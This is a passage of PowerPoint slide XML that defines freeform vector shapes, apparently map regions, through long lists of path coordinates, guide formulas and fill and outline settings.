                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="293" y="156"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="293" y="161"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="293" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="293" y="174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="292" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="291" y="183"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="193"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="198"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="293" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="203"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="287" y="204"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="286" y="206"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="295" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="297" y="227"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="301" y="234"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="302" y="235"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="307" y="233"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="312" y="235"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="319" y="237"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="320" y="239"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="326" y="250"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="327" y="251"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="325" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="313" y="259"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="284" y="276"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="295"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="251" y="300"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="229" y="320"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="322"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="204" y="325"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="188" y="328"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="187" y="324"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="188" y="318"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="188" y="314"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="312"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="311"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="311"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="171" y="305"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="308"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="307"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="300"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="297"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="155" y="296"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="293"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="154" y="291"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="280"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="272"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="262"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="244"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="240"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="229"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="198"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="186"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36093" name="Freeform 226"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2602" y="2310"/>
                <a:ext cx="327" cy="328"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1 w 327"/>
                  <a:gd name="T1" fmla="*/ 163 h 328"/>
                  <a:gd name="T2" fmla="*/ 16 w 327"/>
                  <a:gd name="T3" fmla="*/ 149 h 328"/>
                  <a:gd name="T4" fmla="*/ 35 w 327"/>
                  <a:gd name="T5" fmla="*/ 145 h 328"/>
                  <a:gd name="T6" fmla="*/ 48 w 327"/>
                  <a:gd name="T7" fmla="*/ 137 h 328"/>
                  <a:gd name="T8" fmla="*/ 59 w 327"/>
                  <a:gd name="T9" fmla="*/ 127 h 328"/>
                  <a:gd name="T10" fmla="*/ 79 w 327"/>
                  <a:gd name="T11" fmla="*/ 117 h 328"/>
                  <a:gd name="T12" fmla="*/ 77 w 327"/>
                  <a:gd name="T13" fmla="*/ 106 h 328"/>
                  <a:gd name="T14" fmla="*/ 90 w 327"/>
                  <a:gd name="T15" fmla="*/ 103 h 328"/>
                  <a:gd name="T16" fmla="*/ 104 w 327"/>
                  <a:gd name="T17" fmla="*/ 98 h 328"/>
                  <a:gd name="T18" fmla="*/ 119 w 327"/>
                  <a:gd name="T19" fmla="*/ 88 h 328"/>
                  <a:gd name="T20" fmla="*/ 110 w 327"/>
                  <a:gd name="T21" fmla="*/ 75 h 328"/>
                  <a:gd name="T22" fmla="*/ 109 w 327"/>
                  <a:gd name="T23" fmla="*/ 49 h 328"/>
                  <a:gd name="T24" fmla="*/ 102 w 327"/>
                  <a:gd name="T25" fmla="*/ 40 h 328"/>
                  <a:gd name="T26" fmla="*/ 113 w 327"/>
                  <a:gd name="T27" fmla="*/ 37 h 328"/>
                  <a:gd name="T28" fmla="*/ 122 w 327"/>
                  <a:gd name="T29" fmla="*/ 28 h 328"/>
                  <a:gd name="T30" fmla="*/ 132 w 327"/>
                  <a:gd name="T31" fmla="*/ 26 h 328"/>
                  <a:gd name="T32" fmla="*/ 137 w 327"/>
                  <a:gd name="T33" fmla="*/ 26 h 328"/>
                  <a:gd name="T34" fmla="*/ 150 w 327"/>
                  <a:gd name="T35" fmla="*/ 14 h 328"/>
                  <a:gd name="T36" fmla="*/ 174 w 327"/>
                  <a:gd name="T37" fmla="*/ 11 h 328"/>
                  <a:gd name="T38" fmla="*/ 186 w 327"/>
                  <a:gd name="T39" fmla="*/ 10 h 328"/>
                  <a:gd name="T40" fmla="*/ 196 w 327"/>
                  <a:gd name="T41" fmla="*/ 5 h 328"/>
                  <a:gd name="T42" fmla="*/ 209 w 327"/>
                  <a:gd name="T43" fmla="*/ 6 h 328"/>
                  <a:gd name="T44" fmla="*/ 219 w 327"/>
                  <a:gd name="T45" fmla="*/ 9 h 328"/>
                  <a:gd name="T46" fmla="*/ 233 w 327"/>
                  <a:gd name="T47" fmla="*/ 5 h 328"/>
                  <a:gd name="T48" fmla="*/ 247 w 327"/>
                  <a:gd name="T49" fmla="*/ 6 h 328"/>
                  <a:gd name="T50" fmla="*/ 253 w 327"/>
                  <a:gd name="T51" fmla="*/ 1 h 328"/>
                  <a:gd name="T52" fmla="*/ 261 w 327"/>
                  <a:gd name="T53" fmla="*/ 5 h 328"/>
                  <a:gd name="T54" fmla="*/ 274 w 327"/>
                  <a:gd name="T55" fmla="*/ 4 h 328"/>
                  <a:gd name="T56" fmla="*/ 268 w 327"/>
                  <a:gd name="T57" fmla="*/ 15 h 328"/>
                  <a:gd name="T58" fmla="*/ 269 w 327"/>
                  <a:gd name="T59" fmla="*/ 41 h 328"/>
                  <a:gd name="T60" fmla="*/ 264 w 327"/>
                  <a:gd name="T61" fmla="*/ 52 h 328"/>
                  <a:gd name="T62" fmla="*/ 259 w 327"/>
                  <a:gd name="T63" fmla="*/ 72 h 328"/>
                  <a:gd name="T64" fmla="*/ 267 w 327"/>
                  <a:gd name="T65" fmla="*/ 81 h 328"/>
                  <a:gd name="T66" fmla="*/ 275 w 327"/>
                  <a:gd name="T67" fmla="*/ 94 h 328"/>
                  <a:gd name="T68" fmla="*/ 285 w 327"/>
                  <a:gd name="T69" fmla="*/ 119 h 328"/>
                  <a:gd name="T70" fmla="*/ 286 w 327"/>
                  <a:gd name="T71" fmla="*/ 136 h 328"/>
                  <a:gd name="T72" fmla="*/ 293 w 327"/>
                  <a:gd name="T73" fmla="*/ 161 h 328"/>
                  <a:gd name="T74" fmla="*/ 292 w 327"/>
                  <a:gd name="T75" fmla="*/ 179 h 328"/>
                  <a:gd name="T76" fmla="*/ 294 w 327"/>
                  <a:gd name="T77" fmla="*/ 198 h 328"/>
                  <a:gd name="T78" fmla="*/ 287 w 327"/>
                  <a:gd name="T79" fmla="*/ 204 h 328"/>
                  <a:gd name="T80" fmla="*/ 297 w 327"/>
                  <a:gd name="T81" fmla="*/ 227 h 328"/>
                  <a:gd name="T82" fmla="*/ 307 w 327"/>
                  <a:gd name="T83" fmla="*/ 233 h 328"/>
                  <a:gd name="T84" fmla="*/ 320 w 327"/>
                  <a:gd name="T85" fmla="*/ 239 h 328"/>
                  <a:gd name="T86" fmla="*/ 325 w 327"/>
                  <a:gd name="T87" fmla="*/ 252 h 328"/>
                  <a:gd name="T88" fmla="*/ 273 w 327"/>
                  <a:gd name="T89" fmla="*/ 284 h 328"/>
                  <a:gd name="T90" fmla="*/ 229 w 327"/>
                  <a:gd name="T91" fmla="*/ 320 h 328"/>
                  <a:gd name="T92" fmla="*/ 188 w 327"/>
                  <a:gd name="T93" fmla="*/ 328 h 328"/>
                  <a:gd name="T94" fmla="*/ 188 w 327"/>
                  <a:gd name="T95" fmla="*/ 314 h 328"/>
                  <a:gd name="T96" fmla="*/ 178 w 327"/>
                  <a:gd name="T97" fmla="*/ 311 h 328"/>
                  <a:gd name="T98" fmla="*/ 168 w 327"/>
                  <a:gd name="T99" fmla="*/ 308 h 328"/>
                  <a:gd name="T100" fmla="*/ 156 w 327"/>
                  <a:gd name="T101" fmla="*/ 297 h 328"/>
                  <a:gd name="T102" fmla="*/ 154 w 327"/>
                  <a:gd name="T103" fmla="*/ 291 h 328"/>
                  <a:gd name="T104" fmla="*/ 124 w 327"/>
                  <a:gd name="T105" fmla="*/ 272 h 328"/>
                  <a:gd name="T106" fmla="*/ 82 w 327"/>
                  <a:gd name="T107" fmla="*/ 240 h 328"/>
                  <a:gd name="T108" fmla="*/ 60 w 327"/>
                  <a:gd name="T109" fmla="*/ 225 h 328"/>
                  <a:gd name="T110" fmla="*/ 0 w 327"/>
                  <a:gd name="T111" fmla="*/ 186 h 328"/>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327"/>
                  <a:gd name="T169" fmla="*/ 0 h 328"/>
                  <a:gd name="T170" fmla="*/ 327 w 327"/>
                  <a:gd name="T171" fmla="*/ 328 h 328"/>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327" h="328">
                    <a:moveTo>
                      <a:pt x="0" y="186"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="160"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="154" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="182" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="190" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="196" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="203" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="207" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="209" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="211" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="213" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="219" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="222" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="228" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="233" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="237" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="244" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="249" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="251" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="253" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="259" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="261" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="266" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="274" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="274" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="269" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="268" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="268" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="268" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="269" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="269" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="267" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="264" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="256" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="259" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="261" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="264" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="267" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="268" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="272" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="275" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="280" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="285" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="287" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="286" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="292" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="293" y="156"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="293" y="161"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="293" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="293" y="174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="292" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="291" y="183"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="193"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="198"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="293" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="203"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="287" y="204"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="286" y="206"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="295" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="297" y="227"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="301" y="234"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="302" y="235"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="307" y="233"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="312" y="235"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="319" y="237"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="320" y="239"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="326" y="250"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="327" y="251"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="325" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="313" y="259"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="284" y="276"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="295"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="251" y="300"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="229" y="320"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="322"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="204" y="325"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="188" y="328"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="187" y="324"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="188" y="318"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="188" y="314"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="312"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="311"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="311"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="171" y="305"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="308"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="307"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="300"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="297"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="155" y="296"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="293"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="154" y="291"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="280"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="272"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="262"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="244"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="240"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="229"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="198"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="186"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36094" name="Freeform 227"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3071" y="1856"/>
                <a:ext cx="93" cy="71"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 28 w 93"/>
                  <a:gd name="T1" fmla="*/ 54 h 71"/>
                  <a:gd name="T2" fmla="*/ 29 w 93"/>
                  <a:gd name="T3" fmla="*/ 47 h 71"/>
                  <a:gd name="T4" fmla="*/ 30 w 93"/>
                  <a:gd name="T5" fmla="*/ 43 h 71"/>
                  <a:gd name="T6" fmla="*/ 27 w 93"/>
                  <a:gd name="T7" fmla="*/ 40 h 71"/>
                  <a:gd name="T8" fmla="*/ 23 w 93"/>
                  <a:gd name="T9" fmla="*/ 39 h 71"/>
                  <a:gd name="T10" fmla="*/ 17 w 93"/>
                  <a:gd name="T11" fmla="*/ 38 h 71"/>
                  <a:gd name="T12" fmla="*/ 10 w 93"/>
                  <a:gd name="T13" fmla="*/ 35 h 71"/>
                  <a:gd name="T14" fmla="*/ 7 w 93"/>
                  <a:gd name="T15" fmla="*/ 32 h 71"/>
                  <a:gd name="T16" fmla="*/ 4 w 93"/>
                  <a:gd name="T17" fmla="*/ 33 h 71"/>
                  <a:gd name="T18" fmla="*/ 1 w 93"/>
                  <a:gd name="T19" fmla="*/ 22 h 71"/>
                  <a:gd name="T20" fmla="*/ 0 w 93"/>
                  <a:gd name="T21" fmla="*/ 10 h 71"/>
                  <a:gd name="T22" fmla="*/ 7 w 93"/>
                  <a:gd name="T23" fmla="*/ 6 h 71"/>
                  <a:gd name="T24" fmla="*/ 19 w 93"/>
                  <a:gd name="T25" fmla="*/ 0 h 71"/>
                  <a:gd name="T26" fmla="*/ 29 w 93"/>
                  <a:gd name="T27" fmla="*/ 1 h 71"/>
                  <a:gd name="T28" fmla="*/ 33 w 93"/>
                  <a:gd name="T29" fmla="*/ 2 h 71"/>
                  <a:gd name="T30" fmla="*/ 37 w 93"/>
                  <a:gd name="T31" fmla="*/ 2 h 71"/>
                  <a:gd name="T32" fmla="*/ 43 w 93"/>
                  <a:gd name="T33" fmla="*/ 2 h 71"/>
                  <a:gd name="T34" fmla="*/ 52 w 93"/>
                  <a:gd name="T35" fmla="*/ 5 h 71"/>
                  <a:gd name="T36" fmla="*/ 58 w 93"/>
                  <a:gd name="T37" fmla="*/ 4 h 71"/>
                  <a:gd name="T38" fmla="*/ 63 w 93"/>
                  <a:gd name="T39" fmla="*/ 0 h 71"/>
                  <a:gd name="T40" fmla="*/ 68 w 93"/>
                  <a:gd name="T41" fmla="*/ 8 h 71"/>
                  <a:gd name="T42" fmla="*/ 77 w 93"/>
                  <a:gd name="T43" fmla="*/ 12 h 71"/>
                  <a:gd name="T44" fmla="*/ 84 w 93"/>
                  <a:gd name="T45" fmla="*/ 18 h 71"/>
                  <a:gd name="T46" fmla="*/ 90 w 93"/>
                  <a:gd name="T47" fmla="*/ 22 h 71"/>
                  <a:gd name="T48" fmla="*/ 89 w 93"/>
                  <a:gd name="T49" fmla="*/ 27 h 71"/>
                  <a:gd name="T50" fmla="*/ 90 w 93"/>
                  <a:gd name="T51" fmla="*/ 31 h 71"/>
                  <a:gd name="T52" fmla="*/ 92 w 93"/>
                  <a:gd name="T53" fmla="*/ 33 h 71"/>
                  <a:gd name="T54" fmla="*/ 90 w 93"/>
                  <a:gd name="T55" fmla="*/ 37 h 71"/>
                  <a:gd name="T56" fmla="*/ 87 w 93"/>
